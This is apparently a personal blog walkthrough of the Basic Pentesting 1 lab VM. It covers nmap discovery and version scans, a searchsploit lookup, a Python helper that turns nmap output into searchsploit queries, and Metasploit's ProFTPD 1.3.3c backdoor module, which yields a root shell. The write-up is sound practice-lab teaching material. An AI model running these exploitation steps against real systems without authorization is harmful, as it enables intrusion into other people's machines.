Basic Pentesting 1

In this post I’m going to try my hand at Basic Pentesting 1 by Josiah Pierce. For the purpose of this article, command line entries and results will be in italics.

First things first, let’s find it with nmap.

nmap 192.168.1.0/24 > nmap-network_results.

which (among other things) turned up the following VM, which was new to my network.

Nmap scan report for vtcsec.pyrrh1c.net (192.168.1.227)
Host is up (0.0012s latency).
Not shown: 997 closed ports
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
MAC Address: 08:00:27:14:06:50 (Oracle VirtualBox virtual NIC)

Interestingly, it looks like its hostname is vtcsec (made a note of that…). Aside from that I see ftp, ssh, and http open. Let’s get some more details with nmap.

nmap -sV -O 192.168.1.227 > nmap-sv-o-results.txt

Which produced the following results.

Starting Nmap 7.70 ( https://nmap.org ) at 2019-01-05 11:32 EST
Nmap scan report for vtcsec.pyrrh1c.net (192.168.1.227)
Host is up (0.00094s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD 1.3.3c
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.6 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
MAC Address: 08:00:27:14:06:50 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 – 4.9
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.91 seconds

Ok, now we’ve got the versions of the services. Let’s see if there’s any low-hanging fruit here. I’ll check searchsploit for the FTP server.

searchsploit proftpd 1.3.3c

The output didn’t copy neatly to this blog format (I run URXVT, so it’s likely some Unicode that won’t translate to ASCII neatly… whatever). I did find two options available; the one that interests me was “Backdoor Command Execution (Metasploit)”. So let’s fire up Metasploit and see what we can do.
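The two steps above (read service versions out of nmap, then ask searchsploit about each one) are easy to script, and doing so keeps you from skipping a banner by hand. The following is an added example for this write-up, not code from the original post or from the Basic Pentesting VM: it parses nmap's normal text output (the -sV -O result above, embedded here as a constructed sample so it runs offline), reduces each VERSION column to a product and a version, and builds the searchsploit command for it. The regexes are written for nmap's normal output layout; on a real engagement the simpler route is to scan with -oX and hand the XML to searchsploit --nmap, which does the same matching.

```python
"""Turn an nmap -sV scan into per-service searchsploit queries.

Added example for this write-up (not the post's or the VM author's own
code). It parses nmap's *normal* text output, the layout pasted in the
post above; the regexes below are written for that layout only.
"""
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Constructed sample: the -sV -O result from the post, embedded so the
# script runs offline without a live target.
SAMPLE_NMAP_OUTPUT = """\
Starting Nmap 7.70 ( https://nmap.org ) at 2019-01-05 11:32 EST
Nmap scan report for vtcsec.pyrrh1c.net (192.168.1.227)
Host is up (0.00094s latency).
Not shown: 997 closed ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     ProFTPD 1.3.3c
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.6 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
MAC Address: 08:00:27:14:06:50 (Oracle VirtualBox virtual NIC)
"""


@dataclass
class Service:
    host: str
    port: int
    proto: str
    state: str
    name: str
    version: str  # raw VERSION column; empty when nmap printed no banner


HOST_RE = re.compile(r"^Nmap scan report for (\S+)(?: \((\S+)\))?$")
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)(?:\s+(.*))?$")


def parse_nmap(text: str) -> List[Service]:
    """Extract one Service per port line, tagged with the host it belongs to."""
    services: List[Service] = []
    host: Optional[str] = None
    for line in text.splitlines():
        m = HOST_RE.match(line)
        if m:
            host = m.group(2) or m.group(1)  # prefer the IP in parentheses over the hostname
            continue
        m = PORT_RE.match(line)
        if m and host:
            port, proto, state, name, version = m.groups()
            services.append(Service(host, int(port), proto, state, name, (version or "").strip()))
    return services


def product_and_version(version_field: str) -> Optional[Tuple[str, str]]:
    """Reduce a VERSION column to (product, version).

    A trailing parenthesised hint such as '(Ubuntu Linux; protocol 2.0)'
    is dropped first; the version is the first token that starts with a
    digit, and everything before it is the product name.
    """
    v = re.sub(r"\s*\(.*\)\s*$", "", version_field)
    m = re.match(r"^(.*?)\s+(\d[\w.]*)", v)
    if not m:
        return None
    return m.group(1), m.group(2)


def searchsploit_command(product: str, version: str) -> str:
    """The command the post runs by hand, e.g. 'searchsploit proftpd 1.3.3c'.

    searchsploit ANDs its terms, so a multi-word product is split into
    separate terms rather than passed as one quoted string.
    """
    terms = product.lower().split() + [version]
    return "searchsploit " + " ".join(terms)


def triage(text: str) -> List[Tuple[str, int, str, Optional[Tuple[str, str]], Optional[str]]]:
    """Open ports only; a service with no usable banner gets no command."""
    findings = []
    for s in parse_nmap(text):
        if s.state != "open":
            continue
        pv = product_and_version(s.version)
        cmd = searchsploit_command(*pv) if pv else None
        findings.append((s.host, s.port, s.name, pv, cmd))
    return findings


if __name__ == "__main__":
    for host, port, name, pv, cmd in triage(SAMPLE_NMAP_OUTPUT):
        banner = f"{pv[0]} {pv[1]}" if pv else "(no version banner; probe by hand)"
        print(f"{host}:{port}/{name:<5} {banner:<30} {cmd or ''}")
```

Services whose banner nmap could not fingerprint come back with no command at all rather than a guessed one; those are exactly the ports worth poking at manually (netcat, a browser, an FTP client) before moving on.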

msfconsole

Metasploit loads up

search ProFTPD

It runs and there it is: exploit/unix/ftp/proftpd_133c_backdoor! (That module targets the backdoor that was slipped into the 1.3.3c source tarball on the project’s own download server in late 2010, so it only works against builds made from that tampered tarball, not against every 1.3.3c out there.) This should be easy enough then.

use exploit/unix/ftp/proftpd_133c_backdoor
set rhost 192.168.1.227
exploit

Voila. I got a shell. Let’s see who I am.

whoami

I’m root. Well damn. That was easy. I’m quite certain there’s other ways in though. So next time I’ll try some other routes in. That’s all for now.

If you want to see some other vulnerable VM write-ups I’ve done, check out the vulnerable VM category.
